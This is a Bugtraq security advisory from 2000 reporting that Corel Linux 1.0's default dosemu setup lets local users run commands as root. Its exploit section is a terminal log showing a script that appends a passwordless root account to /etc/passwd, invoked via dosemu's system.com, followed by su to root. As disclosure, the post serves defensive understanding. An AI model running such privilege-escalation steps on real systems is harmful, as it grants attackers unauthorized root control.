Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Corel Linux 1.0 dosemu default configuration: Local root vuln

From: suid () SUID KG (suid () SUID KG)
Date: Thu Mar 2 19:44:47 2000

Re all,

Hadn't seen this one around yet, has been on my site for about a week now.

Corel's mailserver bounced me about this IIRC? Whats up Corel?

Cheers.

----------------------------

suid () suid kg - Corel Linux dosemu config error. Local root compromise.

Software:       Corel Linux 1.0 dosemu distribution configuration
URL:            http://linux.corel.com
Version:        Version 1.0
Platforms:      Corel Linux only.
Type:           Default misconfiguration. Noone reads README anymore??

Summary:

        Local users can take advantage of a packaging and configuration
        error (which has been known and documented for a long time) to
        execute arbitrary commands as root.

        We see from the doc/README/SECURITY file as well as
        http://www.dosemu.org/docs/README/0.98/README-3.html
        written in 1997 that this configuration is bad.

Vulnerability:

        The system.com command is available to any user who runs the
        dos emulator. This is a direct violation of the advice from
        the SECURITY readme file:

                Never allow the 'system.com' command (part of dosemu)
                to be executed. It makes dosemu
                execute the libc 'system() function'. Though privileges
                are turned off, the process inherits the
                switched uid-setting (uid=root, euid=user), hence the
                unix process can use setreuid to gain root
                access back. ... the rest you can imagine your self.

Exploit:

        This is a script log which details how to reproduce this:

        
                Script started on Fri Feb 25 13:54:00 2000
                nebula:~$ id
                uid=1000(suid) gid=1000(suid) groups=1000(suid)
                nebula:~$ cat > hack-corel
                #!/bin/bash
                echo "owned::0:0::/:/bin/bash" >> /etc/passwd
                ^D
                nebula:~$ chmod a+rx hack-corel
                nebula:~$ export PATH="$PATH:."
                nebula:~$ dos
                CPU speed set to 430/1 MHz
                Running on CPU=586, FPU=1, rdtsc=1

                        [ snip bunch of dosemu crap ]

                "Welcome to dosemu 0.98!
                C:\> system hack-corel;
                sh: : command not found
                C:\> exitERROR: general protection at 0x3f0ff: 0
                ERROR: SIGSEGV, protected insn...exiting!

                nebula:~$ tail -1 /etc/passwd
                owned::0:0::/:/bin/bash
                nebula:~$ su owned
                nebula:/home/suid# id
                uid=0(root) gid=0(root) groups=0(root)
                nebula:/home/suid# exit
                exit
                nebula:~$ exit

                Script done on Fri Feb 25 13:55:27 2000

Note:
        This is not a vulnerability in dosemu itself. The documentation
        warns users very specifically that this will happen if the system
        is configured as such.

Greets:

        duke
        cr
        active
Previous By Date Next
Previous By Thread Next

Current thread: